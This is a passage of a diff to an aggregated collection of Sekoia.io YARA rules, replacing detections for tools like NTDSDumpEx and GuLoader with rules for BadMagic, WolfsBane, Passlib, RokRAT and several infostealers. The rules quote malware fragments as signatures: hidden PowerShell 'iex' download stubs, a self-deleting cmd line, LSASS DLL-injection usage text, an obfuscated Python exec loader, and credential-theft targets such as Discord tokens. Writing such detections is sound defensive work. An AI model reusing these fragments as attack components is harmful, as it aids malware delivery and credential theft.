-        C6 45 ?? 74
-        C6 45 ?? 72
-        C6 45 ?? 6F
-        C6 45 ?? 6C }
-		$ = { C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 2E
-        C6 45 ?? 00
-        C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 50
-        C6 45 ?? 00
-        C6 45 ?? 48
-        C6 45 ?? 00
-        C6 45 ?? 59
-        C6 45 ?? 00
-        C6 45 ?? 53
-        C6 45 ?? 00
-        C6 45 ?? 49
-        C6 45 ?? 00
-        C6 45 ?? 43
-        C6 45 ?? 00
-        C6 45 ?? 41
-        C6 45 ?? 00
-        C6 45 ?? 4C
-        C6 45 ?? 00
-        C6 45 ?? 44
-        C6 45 ?? 00
-        C6 45 ?? 52
-        C6 45 ?? 00
-        C6 45 ?? 49
-        C6 45 ?? 00
-        C6 45 ?? 56
-        C6 45 ?? 00
-        C6 45 ?? 45 }
+		$ = "Get-WmiObject Win32 ComputerSystem).Domain" nocase wide ascii
+		$ = "Write-Host \"Error1" nocase wide ascii
+		$ = "Write-Host \"Done\" -ForegroundColor Red" nocase wide ascii
+		$ = "sysvol\\$Domain\\Poicies\\$GpoGuid" nocase wide ascii
+		$ = "Function Start-work" nocase wide ascii
+		$ = "Domain: {0}\" -f $Domain)" nocase wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		filesize < 3KB and 5 of them
 }
-rule SEKOIA_Hacktool_Ntdsdumpex_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Generic_Pshscript : FILE
 {
 	meta:
-		description = "Detects NTDSDumpEx based on strings"
+		description = "Detects BadMagic generic powershell script (Possible FPs)"
 		author = "Sekoia.io"
-		id = "9a0fe20a-49e9-4aaf-8f0e-d51800e0a6e0"
-		date = "2022-02-25"
+		id = "82cda554-3c2b-4c04-b9f9-b5ba50c53271"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_ntdsdumpex_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3295816133ca00aeaf3f4967135ed045ed64d20393f482eafbe4e74f0f63aa47"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_generic_pshscript.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f442e1ba815cc7eae0c627db5ad1917021d69b8ce37155923a0f19776aeba95d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241203,28 +241976,24 @@ rule SEKOIA_Hacktool_Ntdsdumpex_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Example : ntdsdumpex.exe -r" ascii wide
-		$ = "[x]can not open output file %s for write." ascii wide
-		$ = "[+]dump completed in %.3f seconds." ascii wide
-		$ = "[+]total %d entries dumped,%d" ascii wide
-		$ = "[x]can not get PEK!" ascii wide
+		$ = "$ExecutablePath"
+		$ = "Start-Sleep -Second 2"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Tool_Soaphound_Strings : FILE
+rule SEKOIA_Apt_Evasive_Panda_Downloader_Certificate_Exe : FILE
 {
 	meta:
-		description = "Detects SOAPHound based on strings"
+		description = "Detects downloader used by Evasive Panda (certificate.exe)"
 		author = "Sekoia.io"
-		id = "adf48506-f07d-445a-83cc-0aed3b6b55eb"
-		date = "2024-11-12"
+		id = "1b40fca9-04b1-46b3-b48c-5a148a1b36b9"
+		date = "2024-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_soaphound_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b2a953590d75213388473fb51e6b5f2f"
-		logic_hash = "14ff92230d0999a39a6e1042f5c42b5ae275d90ece3d74727e5da44c569a93eb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_evasive_panda_downloader_certificate_exe.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "38115b463378f58035a0ef0536a6af4adbec7c275164758d312e95300670b695"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241232,26 +242001,24 @@ rule SEKOIA_Tool_Soaphound_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Output files generated in" wide
-		$ = "(&(cn=*)(!(cn=a*))(!(cn=b*))" wide
-		$ = "unicodePassword" wide
-		$ = "net.tcp://localhost:9389/ActiveDirectoryWebServices/" wide
+		$s1 = {C6 45 D4 44 C6 45 D5 74 C6 45 D6 7C C6 45 D7 74 C6 45 D8 79}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Rootkit : FILE
 {
 	meta:
-		description = "Detects the DevTool module used by SharpExt"
+		description = "Detects Gelsemium's WolfsBane rootkit"
 		author = "Sekoia.io"
-		id = "6f589a9c-344a-4ddc-929e-f123a2c3c187"
-		date = "2022-07-29"
+		id = "e93f4515-62f5-4057-a464-aae11cbe0639"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharpext_devtoolmodule_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "61007801d28636c6d88b14225f34910d03e82337520257637a5017d58600b2bc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gelsemium_wolfsbane_rootkit.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "ba08e63ad65a9bdcdb1655f25d32c808"
+		logic_hash = "a7440e1b4c0bbff0d80d7152e3bfb0867abe9b0151b45f88aa656f3c9a55b303"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241259,74 +242026,81 @@ rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "packetProc = function" ascii fullword
-		$ = "var url = request.request.url" ascii fullword
-		$ = "https://mail" ascii fullword
+		$ = "__non_hooked_symbols"
+		$ = "__hidden_literals"
+		$ = "extract_type_2_socket_inode2"
+		$ = "/proc/%s/fd"
+		$ = "pluginkey" wide
+		$ = "mainpath" wide
+		$ = "hiderpath" wide
 
 	condition:
-		all of them and filesize < 50KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Evasive_Panda_Downloader_Certificate_Exe : FILE
+
+rule SEKOIA_Apt_Badmagic_Modules
 {
 	meta:
-		description = "Detects downloader used by Evasive Panda (certificate.exe)"
+		description = "Detect the modules used by the CloudWizard framework"
 		author = "Sekoia.io"
-		id = "1b40fca9-04b1-46b3-b48c-5a148a1b36b9"
-		date = "2024-03-15"
+		id = "e4f1f706-4a46-4a09-b598-e4e8d80f2c4b"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_evasive_panda_downloader_certificate_exe.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "38115b463378f58035a0ef0536a6af4adbec7c275164758d312e95300670b695"
-		score = 75
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_modules.yar#L3-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "no hash has been found on 2023-05-25 to test the rule"
+		logic_hash = "6f8bc35dbf0fd4083a8d93b04b55b2e0e215cd23350243ddd7ba9dd4745c4496"
+		score = 50
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = {C6 45 D4 44 C6 45 D5 74 C6 45 D6 7C C6 45 D7 74 C6 45 D8 79}
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		pe.DLL and pe.exports ( "Start" ) and pe.exports ( "Stop" ) and pe.exports ( "Whoami" ) and pe.exports ( "GetResult" ) and pe.exports ( "GetSettings" )
 }
-rule SEKOIA_Rat_Win_Lilith
+rule SEKOIA_Tool_Swor : FILE
 {
 	meta:
-		description = "Detect the Lilith malware"
+		description = "Detects swor"
 		author = "Sekoia.io"
-		id = "944637e6-c4e4-423f-9f4c-a26b4fce3729"
-		date = "2023-02-23"
+		id = "75ce2ed7-2972-4e04-98dc-451acf80c842"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_lilith.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ac2ad9e68616e6e7d07e105293545c96b72c956dbcf3c3bf317460cafc13be48"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_swor.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "d3f92b3349109fc6de26f5e40800fec15308c27fa4fe81fe42af5030637a3a63"
+		logic_hash = "bcd1c0afece740b82b606aad8bdebcc88b72ae61df6513318215a217021efab4"
 		score = 75
-		quality = 76
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {55 6d 56 6e 55 58 56 6c 63 6e 6c 57 59 57 78 31 5a 55 56 34 51 51 3d 3d}
-		$ = {67 65 74 61 64 64 72 69 6e 66 6f 3a 20 25 73}
+		$old_sword_s1 = "Failed to open payload file: "
+		$old_sword_s2 = "Failed to open config file: "
+		$sword_s1 = "open encrypted file error: "
+		$sword_s2 = "open config file error: "
+		$enum_calendar = "EnumCalendarInfo"
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and $enum_calendar and ( 2 of ( $old_sword_s* ) or 2 of ( $sword_s* ) ) and filesize < 1MB and true
 }
-rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
+rule SEKOIA_Malware_Win_Passlib : FILE
 {
 	meta:
-		description = "Detects xored DLL from MustangPanda embedding a document"
+		description = "Detect the Passlib malware"
 		author = "Sekoia.io"
-		id = "73d13624-01df-41ab-b449-86db43dc6c55"
-		date = "2022-07-19"
+		id = "609999e2-a644-4bf3-bce2-b0e1b0e7094b"
+		date = "2022-07-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_xoreddll.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "685be191cf187c0d5bfd00354400c47a961c9d047aa7e65e4cfc2201ec5eb1bc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_win_passlib.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5e76f7c40a00182ee076720b4c19a45e82a8ce11740fdd8e9419f9d9e93cdb41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241334,28 +242108,38 @@ rule SEKOIA_Apt_Mustangpanda_Xoreddll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$clear = "This program cannot be run in DOS mode"
-		$stub = "This program cannot be run in DOS mode" xor
-		$res1 = "5w>w9wR'31Z" xor
-		$res2 = "r0y0~0KlBD" xor
-		$res3 = "d&o&h&öé7Æ" xor
-		$res4 = "9{2{5{+0" xor
+		$ = "Passlib test utility - Version %s" wide
+		$ = "-l <full_path_to_dll_to_load_into_lsass> (arbitrary dll injection into LSASS)" wide
+		$ = "-u <dll_to_unload_from_lsass> (arbitrary dll uninjection from LSASS)" wide
+		$ = "DLL %s injection was successful requested!" wide
+		$ = "DLL %s uninjection was successful requested!" wide
+		$ = "Process %s was succesfully created with full privileges and system integrity!" wide
+		$ = "full_path_to_volatile_payload_dll" wide
+		$ = "%s: [%s]:[%s] (http_only:%d)" wide
+		$ = "LEX server has been deployed at lsass." wide
+		$ = "LEX client is using volatile payload at: %s" wide
+		$ = "LEX client is using permanent payload at: %s" wide
+		$ = "Passlib execution finished" wide
+		$ = "Running on Passlib version %ws" wide
+		$ = "There was a problem initializing passlib manager interface." wide
+		$ = "Passlib running without high integrity" wide
+		$ = "About to dump passwords through passlib manager interface" wide
 
 	condition:
-		$stub and any of ( $res* ) and not $clear and filesize < 3MB
+		uint16( 0 ) == 0x5A4D and filesize > 1500KB and all of them
 }
-rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
+rule SEKOIA_Rat_Win_Konni_Rat : FILE
 {
 	meta:
-		description = "Detects IMAPLoader malware"
+		description = "Detect the KONNI RAT DLL files (x32 and x64)"
 		author = "Sekoia.io"
-		id = "e1706b59-5c94-4fbf-8560-0022ca631d1d"
-		date = "2023-11-13"
+		id = "032f1c79-6f03-4588-a4af-38b1f3ca1cb8"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_tortoiseshell_imaploader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "93f57940ed69145064e5153cc9b099fb9456116cae808acfb4e6f7f14003dde7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_konni_rat.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "764e75d3e433a8784e826f436896c50c9622129412ff277b55ec9aaf1402ff5e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241363,61 +242147,64 @@ rule SEKOIA_Apt_Tortoiseshell_Imaploader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "yandex.com"
-		$s2 = "saveImapMessage.pdb"
-		$s3 = "downloader"
-		$s4 = "MailServer.Auth"
+		$ = ".cab" wide
+		$ = ".zip" wide
+		$ = ".rar" wide
+		$ = ".ini" wide
+		$ = ".dat" wide
+		$ = "%s(%d)" wide
+		$ = "%s %s \"%s\"" wide
+		$ = "\\Temp\\" wide
 
 	condition:
-		filesize < 1MB and 3 of them
+		uint16( 0 ) == 0x5A4D and all of them and filesize > 60KB and filesize < 120KB
 }
-rule SEKOIA_Infostealer_Win_Bebra : FILE
+rule SEKOIA_Backdoor_Win_Rokrat : FILE
 {
 	meta:
-		description = "Find samples of Bebra Stealer based on specific strings"
+		description = "Detect the RokRAT malware"
 		author = "Sekoia.io"
-		id = "e84d04a7-1232-47e5-b797-ac8e56066796"
-		date = "2023-02-06"
+		id = "97a3acc1-4120-4d67-a6ad-fa204f2fd7f5"
+		date = "2023-07-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_bebra.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "7841746c54c53dbcafdf3f357c7a84b90fe3b089e07f30dea15ef6f7f15b0f00"
-		logic_hash = "588fa3091f0dc565123c60d59479202d036e092499eca6204d420395ddc332f9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_rokrat.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "42e0b8583570d32a5d6a5bed175a53951e7d68d8471a283ef245686621dc01c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "84760cac26513915ebfb0a80ad3ddabe62f03ec4fda227d63e764f9c4a118c4e"
+		hash2 = "758348521331bb18241d1cfc90d7e687dbc5bad8d596a2b2d6a9deb6cfc8cb1d"
+		hash3 = "2a253c2aa1db3f809c86f410e4bd21f680b7235d951567f24d614d8e4d041576"
+		hash4 = "ebce34cdeb20bc8c75249ce87a3080054f48b03ef66572fbc9dc40e6c36310d6"
+		hash5 = "a1e4e95a20120f16adacb342672eec1e73bd7826b332096f046bb7e2b7cd80a1"
+		hash6 = "3be58a7a7a25dbceee9e7ef06ef20aa86aef083be19db9e5ffb181d3f9f6615a"
+		hash7 = "fa4df84071b9ae20b321e4d22162d8480f6992206bc046e403c2fbedd1655503"
+		hash8 = "aa76b4db29cf929b4b22457ccb8cd77308191f091cde2f69e578ade9708d7949"
 
 	strings:
-		$str01 = "https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=" ascii
-		$str02 = "https://www.youtube.com/getAccountSwitcher" ascii
-		$str03 = "\"challenge\":\"" ascii
-		$str04 = "\"botguardResponse\":\"" ascii
-		$str05 = "\"continueUrl\":\"https://studio.youtube.com/reauth\"," ascii
-		$str06 = "\"flow\":\"REAUTH_FLOW_YT_STUDIO_COLD_LOAD\"," ascii
-		$str07 = "\"xguardClientStatus\":0" ascii
-		$str08 = "SAPISIDHASH" ascii
-		$str09 = "system32\\cmd.exe /C choice /C Y /N /D Y /T 0 &Del" ascii
-		$str10 = "/new.php" ascii
-		$str11 = "github.com/mattn/go-sqlite3" ascii
+		$ = "--wwjaughalvncjwiajs--"
+		$ = {7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 22 00 25 00 73 00 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 7b 00 22 00 2e 00 74 00 61 00 67 00 22 00 3a 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 7d 00 7d}
+		$ = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 6c 00 6f 00 75 00 64 00 2d 00 61 00 70 00 69 00 2e 00 79 00 61 00 6e 00 64 00 65 00 78 00 2e 00 6e 00 65 00 74 00 2f 00 76 00 31 00 2f 00 64 00 69 00 73 00 6b 00 2f 00 72 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 2f 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3f 00 70 00 61 00 74 00 68 00 3d 00 25 00 73 00 26 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 3d 00 25 00 73}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SEKOIA_Guloader_Vbscript : FILE
+rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
 {
 	meta:
-		description = "visual basic script delivering GuLoader"
+		description = "Detects RoyalRoad weaponized RTF documents"
 		author = "Sekoia.io"
-		id = "3472e403-b1e6-4fdf-9770-af42d505b556"
-		date = "2024-02-07"
+		id = "065e798b-eadd-4aac-a444-de61b75f0273"
+		date = "2022-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guloader_vbscript.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d0398b19ec57cff8afd52b06dc9da18788b1eefdf6be70650138e9b342d91d24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/builder_win_royalroad_rtf.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "831962105248e33422344d1431b90f2b567439b54252668f9294ea388f405b41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241425,25 +242212,25 @@ rule SEKOIA_Guloader_Vbscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = " = CreateObject(\"WScript.Shell\")"
-		$s2 = " = Join("
-		$s3 = ",vbnullstring)"
+		$ = "{\\object\\objocx{\\objdata"
+		$ = "ods0000"
 
 	condition:
-		filesize < 20KB and all of them and #s1 > 1 and @s3- @s2 < 16
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SEKOIA_Guloader_Powershell_1 : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
 {
 	meta:
-		description = "Powershell downloading decoy and delivering GuLoader"
+		description = "Find loader module of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "28c68991-db8b-4f00-b3a3-17286418a4ed"
-		date = "2024-02-07"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f01"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guloader_powershell_1.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9fd2d0e31f939e7e96444eaa4802c9c33407c5fb77067670d8ce2d3796199961"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_enigma_loader_module.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f1623c2f7c00affa3985cf7b9cdf25e39320700fa9d69f9f9426f03054b4b712"
+		logic_hash = "f5485b14291acc299d66b72aefd2d5e558d82f6a90450d293eb147f05423f2d8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241451,26 +242238,32 @@ rule SEKOIA_Guloader_Powershell_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "powershell -win hidden"
-		$s2 = "=iex($"
-		$s3 = ".Replace('"
-		$s4 = "$(Get-ChildItem -Include *.lnk -Name));"
+		$str01 = "Enigma.Loader.Driver_x64.dll" ascii
+		$str02 = "C:\\projects\\driver\\Driver\\x64\\Release\\driver.pdb" ascii
+		$str03 = "/getFile?file_id=" ascii
+		$str04 = "/file/bot" ascii
+		$str05 = "Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator." wide
+		$str06 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
+		$str07 = "Telegram request failed" wide
+		$str08 = "Vul driver data destroyed before unlink" wide
+		$str09 = "GetExportAddress hash not found: %x" wide
+		$str10 = "\\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\PnP Manager\\PnpManager" wide
 
 	condition:
-		all of them and filesize < 10KB and #s3 > 3
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Infostealer_Win_Blackcap : FILE
+rule SEKOIA_Infostealer_Win_Phoenix : FILE
 {
 	meta:
-		description = "Finds BlackCap Grabber samples (Python code obfuscated using Py-Fuscate)"
+		description = "Finds Phoenix Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "1aa1fadb-3413-46e2-b733-1ad2134f7be2"
-		date = "2023-03-06"
+		id = "d63a8fcf-f897-4c36-a6ce-4bd4ae0154e5"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_blackcap.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b826c88d557ea0a516534946ad9531eda1a875cb9c4ddf92d9b98f8c7b86623e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_phoenix.yar#L1-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c8a3a9a36c978cfc28fc6e21af10894161279dfd2e2ad665c3296fda10f6303d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241478,25 +242271,40 @@ rule SEKOIA_Infostealer_Win_Blackcap : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$imp01 = "import asyncio, json, ntpath, random, re, shutil, sqlite3, subprocess, threading, winreg, zipfile, httpx, psutil, win32gui, win32con, pyperclip, base64, requests, ctypes, time" ascii
-		$imp02 = "from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer;from Crypto.Cipher import AES;from PIL import ImageGrab;from win32crypt import CryptUnprotectData" ascii
-		$pyf01 = "import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(binascii.a2b_base64(b'YwAAAAAA" ascii
+		$str01 = "nkbihfbeogaeaoehlefnkodbefgpgknn" ascii
+		$str02 = "Discord\\Tokens.txt" ascii
+		$str03 = "SOFTWARE\\OpenVP" ascii
+		$str04 = "config_dir" ascii
+		$str05 = "| Last Login:" ascii
+		$str06 = "| Games:" ascii
+		$str07 = "| Host:" ascii
+		$str08 = "| Port:" ascii
+		$str09 = "| User:" ascii
+		$str10 = "| Pass:" ascii
+		$str11 = "Grabber.rar" ascii
+		$str12 = "\\GHISLER\\wcx_ftp.ini" ascii
+		$str13 = "Clipboard.txt" ascii
+		$str14 = "PROCESSOR_ARCHITECTURE" ascii
+		$str15 = "PROCESSOR_IDENTIFIER" ascii
+		$str16 = "Log.txt" ascii
+		$str17 = "xXxXxXxXxXx" ascii
+		$str18 = "hq101ejedmwcvvasd02kw" ascii
 
 	condition:
-		($imp01 in ( 0 .. 500 ) and $pyf01 in ( @imp01 + 200 .. @imp01 + 1000 ) or $imp02 in ( 0 .. 1000 ) and $pyf01 in ( @imp02 + 100 .. @imp02 + 500 ) ) and filesize > 100KB and filesize < 500KB
+		uint16( 0 ) == 0x5a4d and 15 of them and filesize > 500KB
 }
-rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
+rule SEKOIA_Merlin_Crossplatform : FILE
 {
 	meta:
-		description = "Finds CryptoClippy samples"
+		description = "Detects Merlin agent cross platform"
 		author = "Sekoia.io"
-		id = "eaa98a8e-e29e-43a4-8b2d-2137d33d4116"
-		date = "2023-04-11"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be6"
+		date = "2022-01-03"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/clipper_win_cryptoclippy.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "057cb5bb957c2338a50c05cfa0177f75bcf263281ddcc5f365298bccafc64cb4"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/merlin_crossplatform.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "975cc4fe0d89383188f9fd3c516d1e853dd6070d7703c0b5b5874dc1e7e6f32a"
 		score = 75
 		quality = 80
